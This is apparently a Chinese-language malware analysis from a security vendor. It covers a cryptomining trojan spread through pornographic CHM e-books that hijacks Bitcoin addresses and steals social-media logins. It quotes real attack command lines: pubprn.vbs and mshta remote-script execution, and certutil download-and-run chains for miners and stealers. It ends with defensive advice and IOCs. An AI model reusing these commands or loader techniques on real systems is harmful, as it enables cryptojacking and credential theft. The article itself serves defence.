挖礦木馬借「XX的秘密」等小黃書瘋傳，中毒後會劫持比特幣交易，混幣圈又愛看小黃書的童鞋務必小心

0x1 概述

近期騰訊御見威脅情報中心捕獲到利用一批色情類電子書（chm格式）傳播的惡意挖礦病毒，病毒使用一批極具誘惑力的文件名（本文分析樣本使用名為「想不想知道xx之間的秘密.chm」）在網路中傳播。

病毒工作流程圖如下：

0x2 樣本分析

Chm文檔結構如下圖，運行Chm文檔後文檔內Load_HTML_CHM0.html內混淆的腳本代碼會以命令行"C:WindowsSystem32wscript.exe" /b C:/Windows/System32/Printing_Admin_Scripts/zh-CN/pubprn.vbs 127.0.0.1 script:hxxp://png.realtimenews.tk/chm.sct

來執行hxxp://png.realtimenews.tk/chm.sct內的遠程腳本。

文檔結構

腳本代碼通過訪問一個外部鏈接的圖片q.png，並查找圖片數據中的tEXt，iENd兩個標記，截取tEXt+4位置到iENd-8處的文件內容，Base64解碼後存放到Temp目錄以tmpg.Jpg命名，並用Rundll32.exe拉起執行，tmpg.Jpg其實為一個帶有導出函數VoidFunc且加殼的DLL。

截取png中隱藏數據

q.png表象上看為一個透明背景中心發亮的PNG圖片。

q.png文件tEXt+4位置指向了一個BASE64編碼的PE文件內容開始位置

q.png文件iENd-8指向了一個BASE64編碼的PE文件內容末尾位置

Rundll32.exe進一步拉起執行tmpg.Jpg

tmpg.Jpg為帶有導出函數VoidFunc的DLL

被RunDll32拉起的tmpg.Jpg通過執行導出函數VoidFun，然後在內存中解密出一段Shellcode，通過CreateThread的方式執行起來。

創建線程執行Shellcode

Shellcode裝載Wininet模塊

Get請求域名藏在解密後的Shellcode尾部

通過抓包工具可以直接看到，Get請求後伺服器發送回來的數據流有一個明文的PE文件，通過從內存Dump出該模塊可知該模塊還是一個DLL，並使用反射式載入的方法，實現該模塊代碼不落地裝載。

病毒Get請求後返回的明文PE文件數據流

反射式載入的DLL

觀察該模塊可知為Cobalt Strike生成的DLL後門攻擊模塊，該後門攻擊模塊數據交互支持HTTP、HTTPS、DNS和SMB隧道協議，本次樣本使用HTTP協議的方式進行通信交互，後門攻擊模塊首先通過異或0x69解密出上線配置信息。

使用異或解密配置信息

解密後的後門明文C2信息，Url、UserAgent信息

通過抓包時可獲得伺服器下髮指令，指令中有指向遠程腳本連接明顯欄位hxxp://d3goboxon32grk2l.tk/reg9.sct，該指令主要為實現挖礦行為。

下髮指令信息

遠程腳本reg9.sct會在系統中添加兩個啟動項，ps5.txt為一個Html頁面，其中夾雜混淆的vbs腳本代碼，reg9.sct啟動項保證其自身遠程腳本邏輯每次開機執行，並結合wmic展開持久性攻擊。

相關腳本代碼

啟動項

之後reg9.sct腳本通過訪問hxxp://d3goboxon32grk2l.tk/gd32.txt 或者gd64.txt鏈接獲取文件流數據然後再本地temp目錄創建啟動一個名為explore.exe的進程，其中會判斷系統版本進一步適配x86或x64的對應程序。

創建運行挖礦程序

.txt後綴文本實際為加Vmp殼的exe可執行文件

觀察挖礦內部信息可知為挖礦端程序，礦池和錢包地址以明文形式存放。除此外，礦機程序還會訪問執行hxxp://down.cacheoffer.tk/d2/reg9.sct、hxxp://xmr.enjoytopic.tk/d2/reg9.sct兩個地址中的遠程腳本，分析時down.cacheoffer.tk/d2/reg9.sct腳本已經清空內容，不排除以後病毒作者繼續使用的可能性，xmr.enjoytopic.tk/d2/reg9.sct中的腳本會再次拉取挖礦程序和添加病毒啟動項來確保病毒正常運行。

reg9.sct自身也會釋放名為evil或evil2的js腳本到Temp目錄執行，js腳本的運行也是同樣為了確保挖礦病毒運行成功。

挖礦病毒內明文內容

病毒使用門羅幣錢包當前信息

ps5.txt內有一個混淆的vbs腳本文件，腳本代碼執行後會帶參數結合dotnet靜態方法執行PowerShell，整理後的dotnet相關代碼分析可知，作用為申請內存創建線程來執行一段Base64編碼過的Shellcode。

ps5.txt中混淆的vbs腳本代碼如上圖所示

PwoerShell去混淆後的dotnet代碼

對Shellcode解碼可知與文章開頭的tmpg.Jpg中的Shellcode代碼相似度極高，依然會嘗試讀取網路文件，不同點是隱藏在Shellcode尾部的域名改為了ssl2.blockbitcoin.com，分析時測試該域名已暫時無法解析，不排除以後病毒團伙會再次啟用。

同樣藏在Shellcode尾部的域名

reg9.sct最後還會拉起一個帶dotnet方法參數的PowerShell，此處參數混淆的方法與ps5.txt處相比主要為數據壓縮方式上有不同，整理混淆代碼後分析可知為從雲端拉取一個fs.png的文件數據，此文件與文章開頭使用腳本拉取的q文件一樣是個透明背景的圖片，並且在圖片內部通過標籤tEXt+4和標籤IEND-12定位到圖片中以BASE64編碼的Shellcode代碼，解碼後Shellcode中隱藏了一個DLL，Shellcode主要功能為載入這個DLL。

混淆的PowerShell參數

整理混淆後的相關代碼

圖片中解碼出的Shellcode文件

DLL惡意代碼執行後會查找Chrome進程，如果當前Chrome進程正在運行，則結束掉Chrome進程，然後以靜默的方式釋放安裝Chrome.crx插件包，進一步達到劫持用戶比特幣交易接受地址，竊取用戶facebook社交帳號和利用社交帳號進一步分享惡意的chm文檔傳播的功能。

查找結束Chome瀏覽器進程

創建Chrome.crx插件包

創建Chrome文件夾並在其中創建名為sec.vbe，manifest.json，background.js，content.js，page.js的腳本文件。

運行sec.vbe腳本，作用為裝載Chrome.crx插件包。

下圖為安裝插件包時的命令行，可知使用--silent-launch參數來隱藏瀏覽器窗口安裝插件，觀察插件相關的混淆js腳本代碼可知，插件主要功能為替換虛擬貨幣交易時的收款地址，二維碼信息。此外，還會竊取社交站點帳號密碼，然後下載chm文檔並上傳到社交站點惡意的chm分享連接來進一步傳播。

插件包安裝命令行

js中用來替換的比特幣收款地址，二維碼信息和門羅幣地址

替換收款地址相關代碼

竊取帳號的社交站點過濾信息

js中的相關的facebook分享連接

js中會訪問一個惡意地址連接，返回的BASE64編碼的數據流

本地解碼數據文件測試為一個chm文檔，此文檔和文章開頭的惡意利用文檔相似，依然含有惡意代碼，目的為進一步通過分享來擴散傳播。

0x3 歷史樣本

Chm格式作為一種常見的文檔類型，經常被不法分子惡意利用，騰訊御見威脅情報中心對此類型病毒早有監控。例如去年雙11期間，騰訊安全團隊監控到的「Torchwood遠控木馬」（http://www.freebuf.com/articles/system/153850.html），該木馬通過多種手段對電商行業進行釣魚攻擊。受害者一旦運行了釣魚文檔，極有可能導致電腦中的重要資料被竊取。

本次病毒樣本樣本中，通過C2地址blockbitcoin.com我們也關聯到了去年騰訊安全團隊發現的一起「利用redis漏洞入侵伺服器挖礦」的攻擊案例。對比兩次案例可知，兩次事件中攻擊者不止使用了相同的C2，作案方式手法也很相似。

故可推測為同一團伙所為，而在「利用redis漏洞入侵伺服器挖礦」事件中，我們也捕獲到了該團伙更多的C2的下髮指令，主要有以下部分內容。

指令1：

mshta hxxp://winapt.s3-accelerate.amazonaws.com/vbs.hta

該程序會掃描計算機目錄下的有bitcoin字元串的文件，然後通過文件中的url地址上傳。

Vbs.hta

上傳頁面

指令2：

certutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/rigd32.exe svchost.exe && svchost.exe -o pool.minexmr.com:5555 -u

45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV -p %COMPUTERNAME% -k -B && certutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/rigd32.exe deleteZcertutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/rigd64.exe svhost.exe && svhost.exe -o pool.minexmr.com:5555 -u

45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV -p %COMPUTERNAME% -k -B && certutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/rigd64.exe deletecertutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/tg.exe svthost.exe && svthost.exe && certutil

-urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/tg.exe

該指令會下載礦機挖礦，然後去下載tg.exe文件，tg.exe會開啟竊取隱私信息線程，線程開始先查找%temp%下.txt文件是否存在並且是否有內容，如果不存在，說明沒有竊取信息，則開始竊取信息，並寫入文件內。

盜取信息

竊取Chrome緩存

竊取Firefox信息

查找Firefox配置文件，並利用nss3.dll函數解密

盜取cookies

此病毒還會通過hxxps://pastebin.com/raw/21Yaa7xn訪問

hxxps://emsisoft.github.io/a.html的一個js挖礦。

訪問鏈接

JS挖礦鏈接

0x4 病毒溯源

通過關聯到的往期病毒相關信息，對js挖礦頁面的溯源發現，該網站是github申請的個人網站，在該項目中，發現b.html同樣是JS挖礦。

github中的項目信息

JS挖礦代碼

在其中一份代碼發現疑似作者信息，結合之前代碼的中文注釋，作者疑似中國人。

作者信息

作者收藏的網站釣魚項目

0x5 安全建議

騰訊御見威脅情報中心提醒用戶注意以下幾點：

1、建議任何時候打開疑似色情內容的文件，須特別小心。病毒木馬傳播者最擅長利用色情內容做掩護傳播病毒木馬；

2、若發現電腦變得異常卡慢，可先通過任務管理器檢查系統資源佔用情況，若CPU、GPU使用率長時間明顯偏高，可懷疑是否遭遇挖礦病毒攻擊，建議使用安全軟體檢查；

3、個人用戶可使用騰訊電腦管家，攔截可能的病毒攻擊。企業用戶可使用騰訊御點（下載地址：https://s.tencent.com/product/yd/index.html）

0x6 IOCs

Url

hxxp://png.realtimenews.tk/chm.sct

hxxp://png.realtimenews.tk/q.png

hxxp://png.realtimenews.tk/fs.png

hxxp://d3goboxon32grk2l.tk/reg9.sct

hxxp://d3goboxon32grk2l.tk/ps5.txt

hxxp://down.cacheoffer.tk/d2/reg9.sct

hxxp://xmr.enjoytopic.tk/d2/reg9.sct

hxxp://news.realnewstime.xyz/news/us

hxxp://winapt.s3-accelerate.amazonaws.com/vbs.hta

hxxp://winapt.s3-accelerate.amazonaws.com/rigd32.exe

hxxp://winapt.s3-accelerate.amazonaws.com/rigd64.exe

hxxp://winapt.s3-accelerate.amazonaws.com/tg.exe

hxxps://pastebin.com/raw/21Yaa7xn

hxxps://emsisoft.github.io/a.html

hxxp://abx.azurewebsites.net/blobupload/windows

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！